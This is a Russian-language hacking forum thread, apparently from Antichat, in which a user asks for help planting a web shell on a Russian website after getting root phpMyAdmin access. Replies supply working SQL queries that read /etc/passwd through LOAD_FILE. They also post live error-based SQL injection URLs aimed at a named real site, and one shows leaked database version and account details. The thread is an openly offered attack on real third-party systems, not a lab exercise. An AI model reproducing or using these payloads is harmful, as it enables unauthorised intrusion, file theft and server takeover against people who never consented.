Зачем ссылку в ПМ? с этого IP нет доступа к MySQL. Он не сможет подключиться. Написано же что "can't connect..."
Начнем сначала Итак я решил ясно расписать мою задачу на сегодняшний день. Поехали! ДАНО(как в школе): Некий русский сайт ЗАДАЧА: Залить шелл с любыми правами ДОСТУПЫ: Phpmyadmin(root); самодельная, на первый взгляд платная админка(Главный администратор) ПРИМЕЧАНИЯ: 1)Касаемо админки: кто хочет из интереса или же с целью помощи узнать её название пишите в ПМ, расскажу, покажу, но только на мой взгляд шансов 1-2%, так как панель истинно идиотская 2)Касаемо phpmyadmin: Исправно работает команда INTO OUTFILE, криво работает команда LOAD_FILE, поясняю, при выполнении кода происходит вот такое в результате: PHP: SELECT LOAD_FILE('/etc/passwd') Результат: BLOB [2,2KB] Как мы видим, на выходе файл, экспортировать, прочитать невозможно. /etc/passwd взято как пример, с другими директориями работает так же. ОСЛОЖНЕНИЯ: До полного идиотизма ситуации добавляет то условие, что директории сайта закрыты для Create/Edit, то есть Errcode (13). Искал все возможные папки и все они оказались закрытые. Следовательно /homedir/site/html/ все три составляющие закрыты. Радовало только одно что хотя бы как минимум /var/ и /tmp/ открыты, но толку от них... РЕШЕНИЕ: Это я предоставляю вам, античатовцы Ваши идеи, предложения, ссылки с информацией, а самое главное ИСПРАВЛЕНИЙ я жду ниже или в ПМ PS: кто решит эту проблему того я назову королем заливания шеллов по крайней мере королем этого форума
Создай темповую таблицу. И результаты лоад файла записывай в нее PHP: UPDATE `tmp` SET `column`=LOAD_FILE('/etc/passwd') WHERE `id`='1';
stan0009, вообще-то там есть доп. опции(в phpmyadmin), с помощью которых ты сможешь не записывая в таблицу результат запроса сразу смотреть.
Отвечаю всем) Isis уже такое пробовалось, я думал не тот запрос... тогда результат был таков: MySQL вернула пустой результат (т.е. ноль рядов) сейчас он, увы, такой же Ereee а можно поподробнее? точнее конкретнее. При экспорте, например, вылетает на главную страницу... Вы когда нибудь работали с этими опциями? кстати, версия 2.9.1.1. xcedz узнать бы еще как это понять). На бд висит еще несколько мини-сайтов. Если сайт является частью БД, то и такое возможно. А что? есть какие то способы?
faza02, софт говорит time-based. В жизни такое не крутил =) stan009, view result in HEX [снять галку] и т.д. Поищи, точно видел.
дело дрянь видимо. галки нет, точнее, когда выполнил запрос ничего как BLOB и распечатать не дают. это при select при update пустое место, хоть ты убирай везде галки, хоть не убирай. запросами ничего не добьешься, доказано! делю вину своих рук и вину гребанного русифицированного phpmyadmin с такой же кривой админкой на пополам) xcedz напомню, что действие разворачивается в phpmyadmin и куда "плюсовать" пока что мне не постижимо. Пойду читать конфиги *okay*
_http://www.gorodokboxing.com/news.php?cat=1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' 5.0.77-log:kievboxing1_portal:[email protected]:redhat-linux-gnu
Константами далеко не уйти, поэтому: Code: http://www.gorodokboxing.com/news.php?cat=1'and(select+1/**/from(select+count(*),concat((select+concat(table_name,0x00)/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by+x)a)and' P.S. Позор мне.
хоть что-то получилось. load_file проканал. теперь как его использовать? PS: view in HEX опять не нашел)) отображается только часть тестового /etc/passwd.
так как же залить шелл через load_file? нужен сам процесс. кстати я уже написал что доступной на запись диры нет, кроме var tmp итд. в чем заключается сейчас проблема. когда я выполнил запрос в таблицу test например load_file /etc/passwd то отображается не полный текст в таблице, а только первые 2-3 десятка символов. Как это исправить?
там над выводом еесть кажется кнопочка +Option вроде так, вот в ней поставь галку на FULL text кажется так
stan0009, load_file() читает файл, через него залить нельзя. подскажите, через какую функцию в mysql сделать так, чтобы php-код из нее исполнялся?
